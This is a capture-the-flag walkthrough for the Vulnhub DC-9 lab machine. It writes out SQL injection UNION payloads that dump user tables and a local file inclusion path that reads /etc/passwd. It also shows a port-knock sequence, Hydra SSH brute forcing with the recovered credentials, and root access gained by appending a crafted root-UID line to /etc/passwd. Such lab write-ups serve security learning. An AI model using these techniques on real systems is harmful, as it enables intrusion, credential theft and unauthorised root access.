DC~9
Exploitation Guide for DC: 9 | Vulnhub | No SQLmap
Last updated
Was this helpful?
Exploitation Guide for DC: 9 | Vulnhub | No SQLmap
Last updated
Was this helpful?
In this walkthrough, We will exploit SQLi to get credentials. Use one of the credentials to login to web app which is vulnerable to LFI . We will use LFI to get information on port knock configuration. Open closed SSH port. Bruteforce SSH with credentials we found. Then, exploit script which can read, and append to files as root to get root privilege.
┌──(imtodess㉿deathnote)-[~/…/boxes/vulnhub/dc9/scans]
└─$ sudo nmap $ip -sVCS -oN nmapInitial.txt -Pn
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-10 00:01 EDT
Nmap scan report for 192.168.1.64
Host is up (0.000084s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp filtered ssh
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Example.com - Staff Details - Welcome
MAC Address: 00:0C:29:2E:41:78 (VMware)We can enter names of employee and it will give back information.
This could be vulnerable to SQLi . Test for SQLi:
Upto 6 we get normal response. But on 7 we get no result.
Test for Union attack:
fred' union select table_name,NULL,NULL,NULL,NULL,NULL from information_schema.tables -- -We got table names in response. We now know search function is vulnerable to SQLi UNION attack . We will use this to get various information.
We will use burp for manual SQli.
Database has following tables:
Now get columns of these tables.
fred' union select column_name,NULL,NULL,NULL,NULL,NULL from information_schema.columns where table_name='Users' -- -Note: URL encode if you are using burp.
fred' union select column_name,NULL,NULL,NULL,NULL,NULL from information_schema.columns where table_name='UserDetails' -- -Get username and password from table users.
fred' union select username,password,NULL,NULL,NULL,NULL from Users -- -We got hash and and username from table Users Now. from UserDetails
fred' union select username,password,NULL,NULL,NULL,NULL from users.UserDetails -- -We now have bunch of usernames and passwords. Make a list for later use.
Notice file does not exist. It seems like it is trying to load a file which is not present in system. Possible LFI vector.
Add ?file=../../../../../../etc/passwd we will get content from /etc/passwd
From the Nmap scan we know that ssh is running on the system but is being filtered. We will search for port knock configuration file.
Found configuration /etc/knockd.conf
Use following one liner to open ssh.
for x in 7469 8475 9842; do nmap -Pn --host-timeout 201 --max-retries 0 -p $x $ip; donechange
IPaccordingly.
┌──(imtodess㉿deathnote)-[~/…/boxes/vulnhub/dc9/loot]
└─$ for x in 7469 8475 9842; do nmap -Pn --host-timeout 201 --max-retries 0 -p $x $ip; done 255 ⨯
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-10 01:26 EDT
Nmap scan report for 192.168.1.64
Host is up (0.00062s latency).
PORT STATE SERVICE
7469/tcp closed unknown
Nmap done: 1 IP address (1 host up) scanned in 0.07 seconds
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-10 01:26 EDT
Nmap scan report for 192.168.1.64
Host is up (0.00056s latency).
PORT STATE SERVICE
8475/tcp closed unknown
Nmap done: 1 IP address (1 host up) scanned in 0.06 seconds
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-10 01:26 EDT
Nmap scan report for 192.168.1.64
Host is up (0.00052s latency).
PORT STATE SERVICE
9842/tcp closed unknown
Nmap done: 1 IP address (1 host up) scanned in 0.06 seconds
Check if SSH is open.
┌──(imtodess㉿deathnote)-[~/…/boxes/vulnhub/dc9/loot]
└─$ nmap $ip -p 22
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-10 01:26 EDT
Nmap scan report for 192.168.1.64
Host is up (0.00063s latency).
PORT STATE SERVICE
22/tcp open ssh
Nmap done: 1 IP address (1 host up) scanned in 0.06 seconds
It is. Now time to use the list of credential we got from earlier to see if we get any valid ssh log
┌──(imtodess㉿deathnote)-[~/…/boxes/vulnhub/dc9/loot]
└─$ hydra -u -L username.txt -P passwords.txt -u $ip ssh -t 10
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, th
ese *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-09-10 04:07:19
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 10 tasks per 1 server, overall 10 tasks, 289 login tries (l:17/p:17), ~29 tries per task
[DATA] attacking ssh://192.168.1.64:22/
[22][ssh] host: 192.168.1.64 login: chandlerb password: UrAG0D!
[22][ssh] host: 192.168.1.64 login: joeyt password: Passw0rd
[22][ssh] host: 192.168.1.64 login: janitor password: Ilovepeepee
Found 3 valid ssh credential. Login as janitor . There is a secret folder in home directory.
┌──(imtodess㉿deathnote)-[~/…/boxes/vulnhub/dc9/loot]
└─$ ssh janitor@192.168.1.64
janitor@192.168.1.64's password:
Linux dc-9 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u2 (2019-11-11) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Fri Sep 10 18:07:42 2021 from 192.168.1.65
janitor@dc-9:~$ ls -la
total 16
drwx------ 4 janitor janitor 4096 Sep 10 18:06 .
drwxr-xr-x 19 root root 4096 Dec 29 2019 ..
lrwxrwxrwx 1 janitor janitor 9 Dec 29 2019 .bash_history -> /dev/null
drwx------ 3 janitor janitor 4096 Sep 10 18:06 .gnupg
drwx------ 2 janitor janitor 4096 Dec 29 2019 .secrets-for-putinFound another sets of credentials:
janitor@dc-9:~$ cd .secrets-for-putin/
janitor@dc-9:~/.secrets-for-putin$ ls
passwords-found-on-post-it-notes.txt
janitor@dc-9:~/.secrets-for-putin$ cat passwords-found-on-post-it-notes.txt
BamBam01
Passw0rd
smellycats
P0Lic#10-4
B4-Tru3-001
4uGU5T-NiGHts
Update the wordlist and bruteforce ssh again.
┌──(imtodess㉿deathnote)-[~/…/boxes/vulnhub/dc9/loot]
└─$ hydra -u -L username.txt -P pass.txt -u $ip ssh -t 10 255 ⨯
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, th
ese *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-09-10 04:14:36
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 10 tasks per 1 server, overall 10 tasks, 340 login tries (l:17/p:20), ~34 tries per task
[DATA] attacking ssh://192.168.1.64:22/
[22][ssh] host: 192.168.1.64 login: fredf password: B4-Tru3-001Switch user to fredf and check for sudo privileges
janitor@dc-9:~/.secrets-for-putin$ su fredf
Password:
fredf@dc-9:/home/janitor/.secrets-for-putin$ cd
fredf@dc-9:~$ sudo -l
Matching Defaults entries for fredf on dc-9:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User fredf may run the following commands on dc-9:
(root) NOPASSWD: /opt/devstuff/dist/test/testWe can run a script as sudo lets see what it does.
fredf@dc-9:/opt$ cd devstuff/
fredf@dc-9:/opt/devstuff$ ls
build dist __pycache__ test.py test.spec
fredf@dc-9:/opt/devstuff$ cat test.
cat: test.: No such file or directory
fredf@dc-9:/opt/devstuff$ cat test.py
#!/usr/bin/python
import sys
if len (sys.argv) != 3 :
print ("Usage: python test.py read append")
sys.exit (1)
else :
f = open(sys.argv[1], "r")
output = (f.read())
f = open(sys.argv[2], "a")
f.write(output)
f.close()
fredf@dc-9:/opt/devstuff$ It simply appends the content of one file to another. Since we can run this script with sudo privilege. We can write on any file. We will write on /etc/passwd file to create a new user with root privilege.
Create password:
fredf@dc-9:/tmp$ openssl passwd givemeroot
Warning: truncating password to 8 characters
BKLzEP1rEQre2 Create file with following line:
fredf@dc-9:/tmp$ cat /tmp/hash.txt
imtodess:BKLzEP1rEQre2:0:0:root:/root:/bin/bashRun the script:
fredf@dc-9:/tmp$ sudo /opt/devstuff/dist/test/test /tmp/hash.txt /etc/passwd Change to new user:
fredf@dc-9:/tmp$ su imtodess
Password: Get the flag:
root@dc-9:/tmp# cd
root@dc-9:~# ls
theflag.txt
root@dc-9:~# cat theflag.txt
███╗ ██╗██╗ ██████╗███████╗ ██╗ ██╗ ██████╗ ██████╗ ██╗ ██╗██╗██╗██╗
████╗ ██║██║██╔════╝██╔════╝ ██║ ██║██╔═══██╗██╔══██╗██║ ██╔╝██║██║██║
██╔██╗ ██║██║██║ █████╗ ██║ █╗ ██║██║ ██║██████╔╝█████╔╝ ██║██║██║
██║╚██╗██║██║██║ ██╔══╝ ██║███╗██║██║ ██║██╔══██╗██╔═██╗ ╚═╝╚═╝╚═╝
██║ ╚████║██║╚██████╗███████╗ ╚███╔███╔╝╚██████╔╝██║ ██║██║ ██╗██╗██╗██╗
╚═╝ ╚═══╝╚═╝ ╚═════╝╚══════╝ ╚══╝╚══╝ ╚═════╝ ╚═╝ ╚═╝╚═╝ ╚═╝╚═╝╚═╝╚═╝
Congratulations - you have done well to get to this point.
Hope you enjoyed DC-9. Just wanted to send out a big thanks to all those
who have taken the time to complete the various DC challenges.
I also want to send out a big thank you to the various members of @m0tl3ycr3w .
They are an inspirational bunch of fellows.
Sure, they might smell a bit, but...just kidding. :-)
Sadly, all things must come to an end, and this will be the last ever
challenge in the DC series.
So long, and thanks for all the fish. 
